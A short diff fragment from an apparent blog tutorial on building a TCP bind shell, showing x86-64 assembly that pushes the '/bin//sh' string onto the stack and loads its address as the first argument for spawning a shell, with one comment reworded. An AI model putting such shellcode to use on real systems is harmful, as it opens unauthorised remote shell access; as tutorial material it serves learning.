J33R4FF3/J33R4FF3.github.io/_posts/2021-02-03-Creating-TCP-Bind-Shell-with-C_2.md

 mov rbx, 0x68732f2f6e69622f ;move the /bin//sh string to rbx register push rbx ;push the value onto the stack

-mov rdi, rsp ;the stack pointer now points to the address of /bin//sh and 8 zero bytes on the stack so lets move that to rdi for first argument
+mov rdi, rsp ;the stack pointer now points to /bin//sh on the stack for first argument

 push rax ; Lets add another 8 zero bytes on the stack